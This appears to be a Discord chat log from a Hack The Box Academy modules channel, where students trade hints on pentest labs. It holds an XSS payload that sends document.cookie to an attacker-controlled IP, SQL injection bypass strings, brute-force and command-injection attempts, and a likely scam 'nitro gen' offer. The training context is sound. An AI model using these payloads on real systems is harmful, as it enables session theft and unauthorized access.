#modules
tried a couple of browsers
its the "external recon and enumeration principles" section
oh n/m it worked eventually
mhmmm yes and no. A red team path Im looking more for C2 usage. Looking more for some evasion and OPSEC etc...
have you looked for databases?
AD module tells me to RDP to Parrot VM, open Wireshark and begin capturing traffic.. If I open Wireshark from tools menu it asks for htb-student password and then just never opens the GUI.. If I try to launch via terminal i get permission denied while trying to capture
I guess I don't need to do it anyway but 5 months on and this hasn't been fixed?
hi
i have a doubt
the sc.nextLine in java always skip a line
how to solve that
Can anyone give me a real world example of non-public sub-domain usage?
Or a reason for why non-public sub-domains would be used outside of testing/learning like in the HTB network.
Sorry... which module and section are you referring to?
this one from Active Directory module on pentest track, it's not needed for the exercises but tells you to login and try.. looks like just permissions issue
Could i text someone about the Module "Active Directory Enumeration & Attacks" section "Privileged Access"?
Password Attacks - Easy Lab - ran hydra with the username/password.list against FTP and SSh for two hours, and got nothing. Hints? this is super unrealistic
Try increasing the number of threads, for me it took >25 minutes
n/m i checked with verbose flag, it was because i locked the user accounts
Active Directory - Internal Password Spraying - from Linux gives two examples to brute force the password. The bash-one liner works for me but the kerbrute password spray (using same users, password, domain, dc etc..) doesn't work, anybody experienced this or know why it might be?
Hi guys I wanted to ask who do I need to speak to regarding the Pentesting academy please I want to enroll on the pentesting course plus purchase the exam voucher are there any offers on that from HTB thank you.
Hello
Module SQL Injection Fundamentals, question:
Login as the user with the id 5 to get the flag
the sql query is:
SELECT * FROM logins WHERE (username='admin' AND id > 1) AND password = '21232f297a57a5a743894a0e4a801fc3';
i tried this:
admin') AND id >4 AND id <6# -
Am I even close? haha
admin') AND id = '5' # -
this did also not work...
any hint in a direction would be nice
do you know what DB its running, that would help inform what would be ideal to terminate the sqli query with.
also your parens placement for your sqli is a bit wrong
youre terminating the where clause early by doing so
mh..not sure...mariadb could be
Anyone know how to test a found username against a password list for SMB? Currently on Attacking Common services module and stuck on the second question. Can't figure out how to brute force the username against the list without being lock outed for too many failed attempts.
Password Attacks Medium Lab - how'd yall get ||Dennis||
Okay I feel must be user error of some sort, but im on the skills assessment for the Shells and Payload module, but I cant actually login with the provided credentials for the foothold.
I get the login screen from the NoMachine interface, but then trying to sign into the htb-student account with HTB_@cademy_stdnt! doesnt work.
Says you can also login with ssh, but ssh is refusing connections.
be aware that it is a en-us keyboard, for me I had to use the On Screen keyboard in order to use the proper characters.
not sure if it helps but i was having issues cause of it
I mean, so is mine, but ill try it
ah the pwnbox keyboard was diff for some reason, annoying lol
@cosmic dock in the database
Stuck on the last question for the DNS section of the footprinting module. I'm pretty sure I know what technique to use (per the hint) but I'm struggling to find the ||wordlist|| that will work. Can someone DM to nudge me in the right direction?
It should be a ||"fierce" wordlist||
Damn I know I tried that. I'll run it again. Thanks for the tip
I'm working on password attacks - password mutations and hydra has been taking me over an hour and it won't crack the user sam's password. can someone please dm me the password to that user? or even just give me a hint to make the command run faster
DID ANYONE PASS THE FIRST ACTIVE DIRECTORY ASSESSMENT?
Need a sanity check for the last flag
I mean if you reached that far maybe you could help me on the Privileged Access lmao
Remind me the question, I don't have my laptop with me
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
the hint says to use mssqlclient but it gets "ConnectionRefusedError: [Errno 111] Connection refused" and according to my scans the port is filtered.
Ok I tried running that a few times and nothing came up...
Paste the command you're using
The one they use on the section
||/usr/bin/impacket-mssqlclient INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth||
same error
https://academy.hackthebox.com/achievement/433014/160 anyone else thinks that SOAP APIs are weird? OMG!!!
Web services and APIs are frequently exposed to provide certain functionalities in a programmatic way between heterogeneous devices and software components. Both web services and APIs can assist in integrating different applications or facilitate separation within a given application. This module covers how to identify the functionality a web se...
it doesn't even try to authenticate to mssql cause the tcp handshake gets refused
hello, anyone who can help me with task 1 of "Introduction to Assembly" assessment? im really stuck there =/
Figured it out. I was so focused in the command i wasnt seeing the obvious
thx anyways
Anyone free to help with Intro to File Upload Attacks? I'm on the whitelist section.
- ||I've found a few extensions that say they upload||.
- ||I found the directory they should have been uploaded to||.
- I'm getting a 404 when trying to access them.
Disregard.
Can i get you help with this module if you dont mind im stuck on the part where im trying to figure out which payload works
Hello im currently trying to figure out which payload i can use for the session hijacking module all the ones ive used are in my notepad but none of them worked in my NC listener perhaps i typed something wrong??
nvm i got now!!!
the ||one that starts with "><script|| worked perfectly for me, have you tried it on ||picture|| input field?
Hello Everybody
yea i did it worked thank you
i actually have another question once i find the working parameter am i supposed to navigate to another page to use it? or am i waiting for the user to enter their creds?
because im just sitting here waiting lol
can you give me a hint, same spot you were before.... seems I keep missing it even if its before my eyes
once you identify the input field which is vulnerable then you need to follow the steps just like explained in that section, craft your payload in script.js file then run the php server, once you submit it you'll get a cookie.
lol, it's instant no need to wait...
think about how you got in. set of creds?
yea i tried that and used this payload "><script src=http://10.10.14.247:443/new Image().src='http://10.10.14.247:443/index.php?c='+document.cookie;></script>
but i got nothing lol
wait are you doing the skills assessment?
no the session hijacking
So for Shells and Payload skill assessment host 2, I understand the exploit and completing it no problem, except that the exploit in question requires a working username and password that is provided to you by the hint in the module scenario section. My question is are you supposed to only know this from clicking the hint, or was there a different intended path for finding this info yourself?
then you're using the wrong payload, it should be like this ||"><script src="http://your IP/script.js"></script>||
in ||script.js|| your payload will look like this ||new Image().src='http://your IP/index.php?c='+document.cookie|| it needs to be in the same directory where the php server is running
can i DM you real quick?
should use tom user/pass somewhere... right?
Hi, can someone help me with this question : "Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78)." (Module - BloodHound Skill assessments) thank you
did you solve this? dont know how to access mysql... I'm burnt
DM me
does any one want to help me with python
I'm just going to come out and say it.. the Abusing Intermediary Applications AJP section is so confusing and should be removed. I just blindly followed the instructions, but in the end don't understand a single thing I did
The following SSRF section is cool though. Extremely insane and just reading it made me have to go to bed now, but at least I have decent understanding of what's happening and how to do it tomorrow
im curious, which module is this?
Just curious what other web related courses have you done? I felt the same way about SQLMap Essentials but when I took it I was brand new to web so I was mostly just reproduced sample commands hoping something would stick
I do recall one or two sections in Server-Side attacks felt super long and I kind of lost attention and skipped to the end. Also the skills assessment is not up to par.
Server-Side attacks I believe
Server side attacks
This is my first course, total newbie, apart from some portswigger labs. The SQLMap section was rough near the end, had trouble figuring out when to use prefix, etc, but managed to get through it by using this chat for hints
Nice. We definitely plan to review the module and update older content to meet our new quality control criteria.
If you plan on going through the bug bounty hunter path, the Command Injections , Web Attacks, File Upload Attacks are all excellent and really build off each other
vert cohesive
*very
I'm about 60% done the bug bounty hunter path, and I'm really enjoying it. The AJP section of Server side attacks just wasn't clear. I still don't even know what I did and why
Those were amazing modules, really enjoyed them and took down notes because everything really made a lot of sense
Definitely appreciate your feedback though. This module was done by a contractor I believe so ill need to check with the team to see what we wanna do when it comes time for module review/updating
I plan on doing every single module offered by the academy and I do want to get the bug bounty hunter certification at the end. It's more of a fun challenge for me than anything else. Not really sure anyone would hire a newbie with only 1 security certification, but who knows
At least from my observations its mostly about connections and who you know... certifications are great but ultimately it comes down to you sitting in front of another person and having a conversation and at that point its gonna be your confidence and skill/experience that gets you the job , not some recruiter seeing a cert on your resume
That makes sense, it feels very different. I'm actually impressed with the SSRF section, but it could use some more newbie friendly explanations. Whoever did it really made an effort into making a complex lab, that's for sure
Yes personally i really enjoyed the module because I had never seen SSRF and SSTI broken down in a way to where I could actually interact and do the thing
The plan is to start doing bug bounties to build up a bit of reputation
SSRF seems complicated to setup in a lab environment, so I'm impressed with the section, hopefully I can solve it tomorrow with a well rested mind
let me know what you think about the skills assessment
not that I recognize many staff yet, but interactions like this jarednexgent is why youre my current favorite staff member.
Will do, I usually come in here to cry when the skills assessments beat me up, so I'll try to do an objective review of it once it's complete
Hi, has someone finished the printingfoot module? im stuck in a question
hehe thanks dawg. Hope you are enjoying the modules!
hi everyone! ok so im on the attacking common apps module doing the wordpress exploitation and i cant find the flag in the webroot! I tried find / -name flag.txt 2>/dev/null to locate it but I cant find it! any advice would be greatly appreciated
I am, almost 30% of the way through the cpts course
its not in /var/www
Just pulled up my notes... hopefully this is the right section
np!
im stuck in the last question of SMB that says "What is the full system path of that specific share?"
I found the path with "netshareenumall" but its incorrect when I submit that as the answer, can someone help me, pls
its a weird formatting issue, feel free to dm
ok, thx
Doing the footprint lab hard - can i get a hint regarding next step once sshd in? I know I need to access the mysql but dont know how.... t## user dont have access, and dont know how to grab other users credentials. THKS!
DM me
Hello all, can someone please help me on the skills assessment of pivoting module?
Thks Man! needed that extra tip.
Question regarding Information Gathering module, Active Infrastructure Identification part. I spawned a target, but there are also vHosts mentioned. Going to any of the vHost adresses is timing out. Scanning a provided IP doesn't return any Apache service (first question asks about the version of Apache). What am I missing?
Do I need to add both names to /etc/hosts? If so - both with the same IP? O.o
yes, but you shouldnt be timing out on scanning.
How will it be decided which vHost I will reach if both will be assigned the same IP? I mean with curl -I -H "host: ..." it's clear but for other stuff? Say when I type the IP into the browser?
when you type in the IP itll go to the default page, which may be a particular host or could just be a server default page, depends on how the server is configured. For your browser, the vhost you put in gets used as a header exactly like in your curl example with the same results.
Same for every other tool, presuming they support headers.
this is how shared hosting servers work in the real world.
Thank you. I think I get it now
np
If anyone can help me with the final assessment in the SQLmap module pls dm me
hi everybody
i have two screens, when i use kali on my notebook screen than everything is so small.
i use vmware and i also tried other Screen Resolutions but nothing seems to be a good solution.
does anybody know the problem?
found it. HiDPI mode
@west olive crawl the site and you'll find a post request
Thank you
Hi guys, unprivileged user can run "lsof" command under root priv. How I can escalate to root?
sup guys, have any of you been doing recently the Attacking Common Services module? Especially first task Attacking SMB. I've been stuck on it whole day
and my question is if it's not corrupted or something
what issue are you facing?
i cant download id_rsa from GGJ share
@dire birch you will need credentials to download it
you will figure out the credentials in second question
ahaha
hi everyone, can I get a hint on "Broken Authentication" module "Brute Force Cookies" Question # 2? I have tried several decoding methods including url decode, base64, base32 and much more?
Any hint please?
Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.
Hey, did anyone have such error while running ticket converter?
ImportError: cannot import name 'KeyBlock' from 'impacket.krb5.ccache'
Hey guys
Where do I look for the credentials of MySQL at password attacks section "Password Reuse / Default passwords" ?
can i dm someone about this question?
academy
Footprinting
dns
They have the HTB pwnbox on the parrotsec downloads page
You can use it through the browser if you don't want to run a parrot vm on your machine and you wouldn't need to download it if you go that route
Anyone?
hi @amber sorrel how did you manage to make it done? any hint please
can I DM you @drifting knoll for this?
guys im doing crackmapexec with --users. I have list of users but how can i save this to a file to to password spraying?
I'm not sure then. You can do the regular ParrotOS, it should be pretty close
There is also a #710108839063846964 channel you can check
help with Web Attacks Skills Assessment. I am able to enumerate the users but i dont see any with username admin or similar and the json does not have a field like role etc
Feel free to dm me if you still need help
Ok let's calm down.
Please keep the channel on topic, as for any NFT discussion, this is not the place.
Thank you for understanding @stone gale and @raven cairn .
@rich mulch check gtfo.bin
@sly grotto did you figure out what fqdn ends with "203"? If not make sure you are adding the target to your /etc/hosts file
Also make sure you dnsenum all sub domains. The answer will stare you in the face.
Need Help. Web Attacks - Skills Assessment "Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'."
GtFo bin does not help bro
I found this but does not understand how to inject
Can anyone can light me up?
thatd be a version specific vuln for lsof
But how to inject?
I read the POC but does not understand
I did try lsof then after that is Command Injection but does not work
Sudo lsfo -i :80&&whoami
have you checked if its even a vulnerable version
Cannot find on searchploit
As well as in google
When I check sudo -l
It say lsof can run no pass, under of root
Must be do something related to this
and whats the version
Revision 4.93.2
I dont see a vuln for that version
Hey guys. Just stopped for a moment to ask how do you guys writing notes while studying ? I'm using CherryTree and it's really nice but I think there are more organised tools. Any suggestions?
however I do see that it gives you file read access for other files, perhaps you need to use that to find a more useful file
I am using keepnots
notes*
I am having a weird issue with one of the modules, Active Subdomain Enumeration, its telling me to get the nameserver FQDN but every time I go to try using dig or nslookup to get the info needed it says it can't locate the server inlanefreight.htb. I have tried putting the server in the hosts file hell I even put the dns servers that the pwnbox use in the resolv.conf just to try and get something but nothing
you can @ the server directly as part of the dig command
I even tried that dig ns Name@IP
Where did u get this
space needed
nvm doesnt actually read file contents, but could still potentially help you find interesting files opened by other users or even kill other processes (which might mean sending other signals to other processes!!)
lsof stands for List Open Files. It is easy to remember lsof command if you think of it as "ls + of", where ls stands for list, and of stands for open files. It is a command line utility which is used to list the information about the files that are opened by various processes.
Ok so it gives me info but not what I am needing
There are only root and unprivilege user
You cannot kill other process
Because it need sudo kill
I have the same problem.
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
netname: sambashare
remark: InFreight SMB v3.1
path: C:\home\sambauser
password:
netname: IPC$
remark: IPC Service (InlaneFreight SMB server (Samba, Ubuntu))
path: C:\tmp
password:
Kill command is not in the list to run under root priv
lsof can kill processes if you read the link I sent
I'm also stuck on this question however I've already decoded the cookie. Use cyberchef and after you've done a step or two look for the magic wand next to Output, that will take you the rest of the way
@west canopy I finished the server side skills assessment and it was definitely anticlimactic. I'm almost certain the entire module could benefit from a rework. Some stuff can be removed and maybe only focus on SSRF and SSTI.
Can anyone help me with flag6 sqlmap?
Web Attacks Skills Assessment. Able to change|| uid in profile page and end up with admin profile|| but not sure what to do from there.
Where are you stuck?
Been working on it for a while. use the hint prefix. still getting nothing
Ok, i'll load it up and have a look, will be good practice
Nice
Can you PM me your sqlmap command? Mine is working
The Password Attacks module is pure agony with how long some of these mandatory brutes require.
kinda feels like its just wasting my time tbh
anyone completed "Web Attacks" Skills Assessment that can help me?
Yes! I did it!
Would you mind a DM?
Sorry! I was celebrating that i found the solution about smb from yesterday. I did not solve your problem.
no worries and congrats
Sorry for ping, but I agree. Skills assessment was gimmicky, rest of the module was very solid.
yes I tend to agree... thanks for your feedback
does anyone know how to hack well with kali linux?
I don't speak English, okay?
No problem. Your english is pretty good.
Thank you
I am interested in learning how to hack a vulnerable website with kali linux
CBBH is a good start
Have to keep it legal on this server tho
will you teach me how to hack????
nothing to do with english skills. just gotta ask a specific question or else nobody can help you.
its like asking how do you fix a car, how do you make art, how do you build a building, how can I farm
ok man relax!
@meager stump fr fr if you have any questions lmk
dont worry I am chill, Im just trying to help you help yourself. And I used an analogy to demonstrate why your question wasnt a helpful question for getting the kind of information youre looking for.
He's being realistic. We're here to help you at the end of the day.
I know, it is difficult to specify some things in English
Just wondering. What is your first language?
probably Spanish/Portuguese
siiiiiiiiiiiiiiiiiiiii
able to get uid and token of administrator type user for web attacks skills assessment but confused as to how to proceed. only links i can click are settings and profile. clicking profile takes me back as htb-student and clicking settings and trying to change admin password says access denied
i got you bro. lol
@amber sorrel use https://github.com/s0md3v/Decodify + Cyberchef. if you want just an spoiler, dm me
any hint for the Attacking Enterprise Networks module section External Information Gathering question 3 "What is the FQDN of the associated subdomain?" i have no idea which FQDN for which subdomain do i need
Any hint for SQLMAP case10?
Hello again so ive been working on the XSS skills assessment and im stuck ive tried all the payloads from the session hijacking module and nothing has worked do you have any tips please?
im not at this spot yet, but is that the correct way to write the address in the script? it wouldn't be src=http:server_ip:port ? i honestly dont know...just being observant
run metasploitable 2 in a virtual machine and try attacking it. it is a good learning machine. you can adjust the security of it as well. has many webapps etc. in addition learn the HTB machines and go through the HTB Academy.
hey just to clarify, when it says "vHosts needed for these questions: status.inlanefreight.local" do we just map it to the targetted IP that just spawned?
yes
lol dam your right hahahah
can someone help me with this?
@thorn urchin Thank you
I'm on the Find Files and Directories module
I am trying the find command like this:
find / -type f -name *.conf -size +25K -size -28k -newermt 2020-03-03
it doesn't show me the file
what am I doing wrong here?
can someone help me out?
XSS Discovery- I know it is supposed to be susceptible to reflected but when i enter the same reflection script as in a previous step it doesnt create the alert pop up
never mind I found answer
anyone around finish skills assessment 1 of active directory enumeration?
Hello guys
Please: Nmap IDS/IPS Evasion Hard Lab ... am I looking at DNS? Or the "high-number-port". Just give me that, at least.
I've come down to copy/pasting the module commands at this point (replacing the port # of course)
because I don't know what else to do. I've been at this on/off for months
Tried combinations of changing trusted-source-port(53), fragmenting, ACK, no-arp, I've even tried spoofing source IP. Tried copy/paste the friggin commands from HTB. The only thing I haven't tried is Zomby-ing from a jump server, which wouldn't make sense under the context
I know what these things are. I'm not just blindly following instruction.

and it's either port 53 or 50,000. nothing else makes sense
AD / RESPONDER
We can capture the hash of an account in the network, if the account/user does a broadcast because he doesnt know where to resolve the Name of a Server requested.
--> But how realistic is that?
I mean, does this broadcast only happen if the account/user mistype the Server Name ??
This can not happen to often, does it ?
I can help. DM me
hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?
I tried to psexec and wmiexec since sql accounts are usually local admins on their server... but it never returns anything
I can help. DM me
Hey, I've been stuck on the command injection skills assessment for so long, I know the vulnerable parameter and I can escape the blacklisted charaters but cant manage to find the flag.txt file, can someone please help me
Anybody else having problems with sublist3r? I tried both local and Pwnbox, all engines together and separate, my target and websites such as google, and it's not returning any results. Like no subdomains existed for google or github. I tried to use it for skill assessment of information gathering as suggested in the hint, but in the end had to do it manually, due to the above :/
Haven't done the module yet, but usually it should be in the home directory, nah?
yeah, but I get an error message saying the i dont have permission to this directory
Sublist3r not working for u?
Hi!!
Who passed the task:
Attacking Domain Trusts - Child -> Parent Trusts - from Linux
Module: -AD Enumeration & Attacks
?
Under what account did you receive the NTLM cache for bross?
At the time I used the tool it worked fine though I've read some comments later where it was having some issues
Maybe the domains are the problem … I will take a look at it
When you say you did it manually you mean with dig and Nslookup?
hello, anyone who can help me with task 1 of "Introduction to Assembly" assessment? im still stuck there =/, thanks in advance!
@inland charm if you manage to execute commands, think the most obvious way of show the results. For the encoding and format of the injection i shared here a tool called 1nj3ct0r that i did. After that think outside of the box to get the flag file into your available files
I tried to move file /flag.txt into the tmp folder to be able to view it
But I got permission denied error
It is not the /tmp folder, enumerate better the site to see, it is a custom /tmp folder
Somepath/tmp
@inland charm you're almost there
Okay thank youu I'll try again
nevermind, i've solved !
for the footprinting academy medium lab, can someone get me a hint for the right syntax for the SQL db query? just missing that to get the flag. thank you
@warm sand what is the problem
hey sorry, figured it out.. was querying it wrong..thanks for the reply
Need help with active directory skill assessment II + 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
im stuck on fundamentals module with Service and Process management. when i run systemctl start ssh it asks for authentication
@vagrant field you are root?? Try "sudo su" first or "sudo systemctl start ssh"
Can I get a nudge on the XSS Skills Assessment? Having no luck with any payload.
Ope, nevermind. Got it
@warm turret im also stuck on the linux fundamental module and when I write sudo before the command I get this response: "htb-student is not in the sudoers file. This incident will be reported."
or if anybody else can help me with my issue, I'll be very thankful
can anyone help me with the password attacks module, ive been stuck for 5 days now and im just at my wits end
systemctl enable ssh returns uninitialized value:
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
can anyone help me please?
@pseudo ledge no idea then, sorry. i did it a year ago
if u want a nitro gen dm me
(online version no virus)
Cyber chef is pretty easy to use if you want to give that a shot
idk where to put this but man has htb helped me get back to working on pc's doing something i am falling in love with
facts..i was telling myself this same thing last night.
sup
Am cool
Am new here
Wats d platform all abt
I nid someone to help me with some hacking problems, please message me if u can
hand in the wrong jar hmmm
haha
For the Active Directory Skill assessment II. Should I be brute forcing ?to get the username and password. Im on this question Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
Hey, new here and I'm kind of confused. I'm in Linux Fundamentals and 15-30sec after I launch the pwnbox it goes grey screen and bottom right says disconnected. I then hit reset but its a brand new instance. All my progress and previous command line inputs gone and I have to keep starting over and I can't progress. How/what do I need to do so it stops doing that?
So I'm working on File Inclusion Basic Bypasses and I'm struggling to snag the flag. I'm using the path it gives (index.php?language=languages/) and I've tried truncating with ||....//|| but no matter what I put after it, I seem to not be able to get it
any one have a idea why bike module is not showing the email part in burp
I need help with something really quick. I know that this command should get me the number of total packages installed:
apt list --installed | wc -l
I'm doing the file descriptors and redirections section of Linux Fundamentals module
could someone give me a hint
If you still need help on this, DM me
hi I think that I am going to finish Linux Fundamentals Module tomorrow for sure
I'm gonna do this last two modules tomorrow and its gonna be great
I just gotta get my work done in the morning
With crt.sh I think. But yeah, I just wonder whether I do something wrong, or if there's a bug in sublist3r perhaps
Hello guys
I have been on a rush yesterday but let me see if I can give it a quick shot during the day and I let you know if the tool has a bug
@molten marlin you can try connecting from your own VM using OpenVPN
Not working for me either sublist3r
@west canopy @distant oar could you please take a look at sublist3r in the skills assessment - information gathering ? Tool doesn't seem to be working now though it worked in the past
Thanks!
did you find out the answer to this? im following the steps of module but same issue with password
tried basically every username and password ive come across throughout the module :/
oh n/m, got it
Nope, unfortunately, I have marked this task under "?" so far.
I wonder how jarednexgent managed to do this under adunn))
#modules message
yeh i was able to replicate the steps ok with htb-student_adm user but didnt get the bross user hash yet :/
Site is not down, its just blacklisted by alot of ISP. Use a VPN to download the binary(thats what i did)
Hey guys, I'm at passwords attacks module section Credential hunting. At question 5 - do I really need to fully install ansible to look for those credentials ?
?
no
Yeah but i doesnt know much
Can you guys dm me some cool tricks in hacking?
@dense maple i am beginner
What do you know in hacking, a little? Idk a little too
just run through beginner courses
I want to learn for free
the level 0 courses are free
I can not be connected to the server...
I am in the module "Getting Started" and the part name is "Service Scanning".
They torture me by calling
run with -v and see if packets are being received
100% packet loss.
okay - Sp see what happens
-Sp ?
?
same server?
?
are you pinging in your own server/network
^
first you should actually use nmap then -Sc
then add IP
the script should start with nmap (-) (-)
xa DNS
I have to see the version but I can not...
and you are root?
man nmap
use man nmap or nmap -h and it will give you version type
Hi everyone, I'm new to security, I've been doing a couple of THM, looking to further studies on HTB.
@brazen saffron use nmap -Sl and -Pn -Sc and see what it gives you and you should have an answer
add -sV
and if you are looking for OS version -O
use -A if those dont work
I've been stuck on the command injection skills assessment for sooo long I literally tried everything and still no hope, I know how to escape the blacklisted characters and I know which parameter is vulnerable. My main problem is when I try the cat command or any other command it is treated as a filename and does not execute as a command, can someone please help me? I can explain in more detail, but it's better to do privately to avoid any spoilers.
@brazen saffron did you use -sL
can someone help me with password attacks - attacking sam "Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer." i believe i have to launch cmd as a first step but i don't see that
Need help with Attacking Tomcat Question 2. Perform a login bruteforcing attack against Tomcat manager at http://web01.inlanefreight.local:8180. What is the valid password? mgr_brute.py and metasploit module don't seem to get me the password.
i was able to figure out the password by looking at the password wordlist and entering manually but not understanding why the previous 2 tools did not work. i also took the password list and prepend the username and encode in burp, still nothing.
Can anyone help me put with the phishing section on the XSS module
anyone available to help with Attacking Tomcat section of Attacking Common Web Applications had to reboot everything and am ok now
anyone around to help with the Footprinting Medium lab? I've been stuck for a while.
@copper coral where are u stuck
i can try to help. whats up
who can i reach out to, to get help on an assessment question? something aint right with it...
which assessment? i can check if i have done it
sorry, i am working on JPT not CBBH, so i wont be able to help/look at all.
k ty
I tried as well and...
yea the hint is BS. There's a couple other things in that module I did not like
I agree β¦ I completed the module some time ago but I think it could be reviewed to improve it
Thanks @west canopy
i'm on password attacks hard and found the kdbx file but i'm struggling on downloading it, can someone help me
Hey i have a question. I am currently on a challenge and i've read the code like 100 times and found two vulns that i have to compare somehow but im just not able to do this. Can someone give me an hint? Would be cool thanks
still looking for help on this.
Where you at?
Python server
I had to resume it a few times with hydra -R. Eventually it found the user/pass
I want to continue backing
But stickers on this bullshit thesis
Stuck*
Fuck school duwde
What is the right way to kill a python web/upload server so when I try and make a new one I don't get the following error ?
CTRL + C
Thats what ive been doing
when I try to remake the server I get that error saying the socket is still in use
Somewhere there is still a service running on port 8000
how do I kill it then as it should of stopped once I killed the server
I tried killing my python process but that didnt work either
try running: sudo lsof -i :8000
this will tell you what process is using port 8000
then we can kill it
netstat -npl
netstat npl got it
looks like I was hitting ctrl z
which i've now learned puts it in the background instead of killing it like ctrl c
Finally another tricky module finished. This File upload attacks, i almost asked for a hint on the skill assessment https://academy.hackthebox.com/achievement/433014/136
Arbitrary file uploads are among the most critical web vulnerabilities. These flaws enable attackers to upload malicious files, execute arbitrary commands on the back-end server, and even take control over the entire server and all web applications hosted on it and potentially gain access to sensitive data or cause a service disruption.
@pastel ginkgo you can also try: netstat -antp
then just kill PID
Can anyone give me a hand with the phishing section on the xss module I'm pretty sure I have the right payload to execute the script on the page but the last bit removing the img input field isn't working and when I try to usnc to listen it tells me the ports in use and it says quiting
Hey! I need a hint in password attacks medium lab. I found J***** creds and the smb creds for D**** user but doesn't work the D smb cred to login with ssh.
Done. If you need a hint just think where you can store data. Search for a process ||top command|| ||database||
hi im stuck at Windows Privilege Escalation Skills Assessment - Part I i cant get reverse shell can anyone give a hint
read back through the module where it talks about dns
read what it says
if youre copying the scans its not gunna work. It tells you a variation to try out in the actual text.
then im afraid you do not understand
changing the IP is a given. but you cannot copy the scans. you must understand what it says and be able to decide how to adjust the scan to get the results.
this is as much advice as Im willing to give, good luck.
you use your brain and think critically about the material instead of copying things.
theres a variation to try out for this situation that it specifically says to try for such a situation
Chill out, Im giving you help, but Im not giving you the answer. You must still reach that on your own. but with this kind of question there isnt a whole lot of wiggle room for giving advice without just telling you the answer.
you might be able to complete it with ncat as an alternate method
different tool
I'm stuck on Archetype. I can't seem to get myssqlclient to download. I've followed a few videos and googled it. Everytime I try to locate MySQLclient it can't find it
might work, best of luck
¯\_(ツ)_/¯
htb modules often presume a certain level of prerequisite knowledge and flexibility for its content. If youre not ready for that, you may in fact be better served elsewhere first.
????
lets calm down here... he was helping you without giving you the answer and your frustrated
I literally tried to help you and then agreed that yeah there are other learning tools out there that might work better for you???
htb has a reputation for being hard, often too hard
youre not alone in having difficulty with it, thats okay
dude there have been modules where i almost punched my screen...had to walk away clear head and come back and get at it
That sucks, no hard feels from my end. Best of luck.
ceh is mostly rote memorization
it has 0 hands on
HTB wont teach you how to pass the ceh, itll teach you how to actually use the skills in the real world
it is, but the format is multiple choice, no practical exam
ceh is mostly about terms, policies, ect
htb is actually doing the shit
CEH will have you answer what metasploit is. HTB will have you tunnel a metasploit priv escalation exploit over a meterpreter channel on a target host where you got a foothold in by abusing a RCE from an outdated blog software that exists in the real world.
that example is literal btw
havnt heard of em
<which doesnt mean they're bad, I just havnt heard of em>
I mean if you got a voucher might as well take it
its still good for resumes
it just doesnt teach you what you need to know to do the job
sounds like a plan
Tough life Ned
You need a.I. to help you predikt the crypto market and get rich while sleeping
@solid wedge doing hacking for the wrong reason. Try to learn hacking just to be better paid will get you even more frustrated. Try to get a job that you could do for free and the money will come after. I spent 6 years earning $16 by month so... Take what you have, try moving out. Think of structure your life first and then learn to hack because you love it and not for a bigger payout. Do BBH at nights maybe
Has anyone heard of Mystopians on CoralCube and are they any good like CryptoPunks will increase in value?
Markup, task 1, answer should be 2.4.41 as that is the version of Apache running, and it matches the suggested answer format, but no bueno
nvm, foxyproxy was on
hi..broken authentication module is killing me..i have enumerated two usernames and how to tamper cookies but those two users are not tamperable. i have tried many wordlists and almost have checked 56000 words but no useful username is being found. please give a hint
its relevant to skills assessment
Thanks to jarednexgent, I still picked up the hash of the NTLM account - bross
If you are interested, I will write in a personal message, so as not to spoil it)
its ok thanks, still had the hash from the output of a previous module xD
Anyone done the introduction of python? Can't find the class of x_coordinate. It tells to do IDLE. But I get no response. What am I missing?
Mods please ban this person
This is the 2nd time they have been advertising crypto nonsense
Shut the fuck up please
@urban sage
HTB isn't really the place for cryptocurrencies. You can talk about forensics on the blockchain in #forensics-cryptography but even then, I'm not sure many would have an interest.
Otherwise please refrain from the topic, especially in #modules this isn't the channel for that.
This is a warning btw @stone gale any more and we'll take action. Keep the channels on topic.
I think theres some mystopians shill effort going around. been a lot of people joining the server to just "ask" about mystopians
100% so people go, no whats that? and google it. More likely to work and get eyeballs that just blatant link spam that people tune out.
Hmm, we'll take note of that, I did see many more people than usual ask weird questions about cryptocurrencies lately.
thanks 
does anyone know why do i get this error msg: ** server can't find inlanefreight.htb: NXDOMAIN
information gathering - web edition/active subdomain enumeration
i added the target ip with the inlanefreight.htb to the hosts file
Can someone provide a nudge for the active directory assessment? I'm having issues using PSSeSSion to remote into another server. I'm logged in as system and trying to authenticate to another box on the same domain ( as Administrator). Running klist shows i have kerberos tickets stored in cache. However PSSession commands are failing / freezing the shell.
thanks in advance.
Got user1 in Privilege Escalation but cant get the root, the hint is don't forget to chmod but I'm not sure if I'm supposed to chmod the is_rsa
id_rsa needs right perms or else ssh wont accept it
madfox. i've seen you help a lot of ppl here. could you help me? im stuck and have no idea what im doin wrong...also the nslookup that is shown in the module to be used doesn't work
you added it to the host file, are you also @rustic sageip for you commands?
Thank you, I got it!
i added to the host file
yeah but for you nslookup are you @ it as well to select it as the name server to use
i just used this so i can give a proper error msg: nslookup -type=any -query=AXFR inlanefreight.htb @10.129.42.195(how do i add it as spoiler if needed???) and i get this error msg: nslookup: couldn't get address for '@10.129.42.195': not found
try @ the domain instead of the ip
I also generally use dig for my domain lookups instead of nslookup so not super familiar with their syntax
doesn't work. i'll check dig
hello everyone, is anyone experienced with reverse engineering? if so i can further explain the problem and my approach so far. Thanks.
what is bobs password on service scanning on getting started
